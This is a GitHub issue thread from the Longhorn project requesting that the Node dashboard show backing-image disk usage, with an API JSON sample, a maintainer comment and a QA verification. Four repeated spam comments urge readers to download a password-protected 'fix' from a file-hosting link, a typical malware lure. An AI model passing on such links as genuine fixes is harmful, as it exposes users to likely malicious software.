### ISSUE TITLE
[UI IMPROVEMENT] Collect and display disk space usage for the backing images

### ISSUE THREAD

**Issue by ChanYiLin** [longhorn/longhorn#9325]
## Is your improvement request related to a feature? Please describe (👍 if you like this request)

In the `Dashboard >> Node`
We now 
- add new field `scheduledBackingImage` in the diskStatus returned from "node" API
- `storageScheduled` includes the BackingImage size
```
            "disks": {
                "default-disk-80aee68157d21cb5": {
                    "allowScheduling": true,
...
                    "diskDriver": "",
                    "diskType": "filesystem",
                    "diskUUID": "57240097-8596-429f-bb30-b3ec970a3c79",
                    "evictionRequested": false,
                    "path": "/var/lib/longhorn/",
                    "scheduledReplica": {},
                    "scheduledBackingImage": {
                        "test": 53248
                        "ubuntu": 3860852736
                    }
                    "storageAvailable": 33973862400,
                    "storageMaximum": 66257006592,
                    "storageReserved": 19877101977,
                    "storageScheduled": 3860905984,
                    "tags": []
                }
```
Thus, in this page we would like to 
1. sum up the backing image size
2. in `Allocated` bar, the backing image size should have different color (different from green) so users can understand how much space is consumed by BackingImage
    - It is better to further show the `BackingImage size sum` and `Replica size sum`  somewhere, we can discuss it when implementing this ticket.

![Screenshot from 2024-08-27 16-34-18](https://github.com/user-attachments/assets/2d943fe5-83cc-457e-8c5d-2d3f33b87e92)

## Describe the solution you'd like

.
## Describe alternatives you've considered

.

## Additional context

cc @a110605

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by houhoucoop** [comment]
On hold, as this requires waiting for the API to be ready.

**Comment by chriscchien** [comment]
Verifed **pass** on longhorn master(https://github.com/longhorn/longhorn-ui/commit/19966a8663233fcf44a62b588247b9c54e9a03e4)

UI show backing image size correctly
![image](https://github.com/user-attachments/assets/ecc030bb-28d8-406a-bf7b-b09207737bb9)
